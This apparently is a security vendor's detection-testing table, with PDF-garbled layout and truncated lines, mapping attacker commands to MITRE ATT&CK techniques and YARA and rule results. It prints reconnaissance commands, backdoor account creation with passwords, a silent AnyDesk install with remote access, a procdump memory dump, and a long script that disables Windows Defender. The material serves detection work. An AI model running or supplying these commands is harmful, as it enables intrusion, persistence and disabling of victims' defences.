
Sr. no.

Commands
1 C:\Windows\system32\cmd.exe /C net time

2 C:\Windows\system32\cmd.exe /C ping qa.corp.qualys.com

3 C:\Windows\system32\cmd.exe /C nltest /dclist:qa.corp.qualys.com

4 C:\Windows\system32\cmd.exe /C Net group "Domain Admins" /domain \

5 C:\Windows\system32\cmd.exe /C nslookup qualys.com

6 C:\Windows\system32\cmd.exe /C ping 190.114.254.116

7 C:\Windows\system32\cmd.exe /C net group /domain


Detection Notes
T1124 - System Time Discovery

T1016.001
System Network Configuration Discovery:
Internet Connection Discovery
T1018
Remote System Discovery
T1018
Remote System Discovery

T1069.002
Permission Groups Discovery: Domain
Groups
T1087.002
Account Discovery: Domain Account
T1018
Remote System Discovery

T1016.001
System Network Configuration Discovery:
Internet Connection Discovery
T1018
Remote System Discovery

T1069.002
Permission Groups Discovery: Domain
Groups
T1087.002
Account Discovery: Domain Account
Sr. no. Commands

1 schtasks /create /tn HpSupport22 /tr C:\users\public\music\star.bat /SC ONSTART /F

2 net user oldadiministrator "qc69t4B#Z0kE3" /add

3 net localgroup Administrators old /ADD

4 net user sqlbackup qc69t4b#z0ke3 /add

5 net user localdomain qc69t4b#z0ke3 /add

6 net localgroup administrators localadmin /add


7 reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run /d "$dst$ /
9 powershell -c "$Source = 'https://anydesk.com/en/downloads/thank-you?dv=win_exe'; $Destination='C:\Pr
10 C:\ProgramData\AnyDesk.exe --install
11 C:\ProgramData\AnyDesk --start-with-win --silent
12 echo J9kzQ2Y0qO | C:\ProgramData\AnyDesk.exe --set-password
13 C:\ProgramData\AnyDesk.exe --get-id

15 wmic /node:"" process call create "cmd /c C:\perflogs\procdump.exe -accepteula -ma


Detection Notes
T1053.005
Scheduled Task/Job:
Scheduled Task

T1078.003
Valid Accounts: Local
Accounts
T1136.001
Create Account: Local
Account

T1098 - Account
Manipulation and
T1078.003 - Valid
Accounts: Local
Accounts

T1078.003 - Valid
Accounts: Local
Accounts; T1136.001 -
Create Account: Local
Account

T1078.003 - Valid
Accounts: Local
Accounts; T1136.001 -
Create Account: Local
Account

T1098 - Account
Manipulation and
T1078.003 - Valid
Accounts: Local
Accounts
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder and T1112 - Modify Registry
YARA gave a score of 9 for the PowerShell AnyDesk download command (step 9: `…?dv=win_exe'; $Destination='C:\Pr…`)
Binary didn't run
Binary didn't run
Binary didn't run
Binary didn't run

T1047
Windows
Management
Instrumentation ProcDump has been tagged by YARA with a score of 9; a ProcDump rule has been created
Sr. no. Commands Detection

T1562.001
Impair Defenses: Disable or
Modify Tools
Q0025
rem reg add "HKLM\System\CurrentControlSet\Services\ Disable or Stop Services, or
4 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f Terminate Processes
5 rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows T1070
6 Defender" /f Indicator Removal on Host
T1562.001
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
7 "DisableAntiSpyware" /t REG_DWORD /d "1" /f Modify Tools
T1562.001
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
8 "DisableAntiVirus" /t REG_DWORD /d "1" /f Modify Tools

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


9 MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableBehaviorMonitoring" /t
10 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableIOAVProtection" /t
11 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableOnAccessProtection" /t
12 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableRealtimeMonitoring" /t
13 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t
14 REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d
15 "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


16 SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


17 SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


18 SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\
20 Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\
Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d
21 "0" /f

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\


23 ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
24 Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
25 Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
26 Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\
27 Windows Defender Verification" /Disable

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


29 Explorer\StartupApproved\Run" /v "Windows Defender" /f

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\


30 Run" /v "Windows Defender" /f

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


31 Run" /v "WindowsDefender" /f
32 rem Remove WD context menu
33 reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

34 reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f


35 reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
36 rem Disable WD services
rem For these to execute successfully, you may need to boot into
37 safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v
38 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v
39 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v
40 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v
41 "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v
42 "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\


43 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
44 rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v
45 "Start" /t REG_DWORD /d "4" /f

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


46 Run" /v "SecurityHealth" /f
Notes

No T1562.001 (Impair Defenses: Disable or Modify Tools) detection score was produced for these Windows Defender tampering commands.

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule

Added a rule
Added a rule

Added a rule
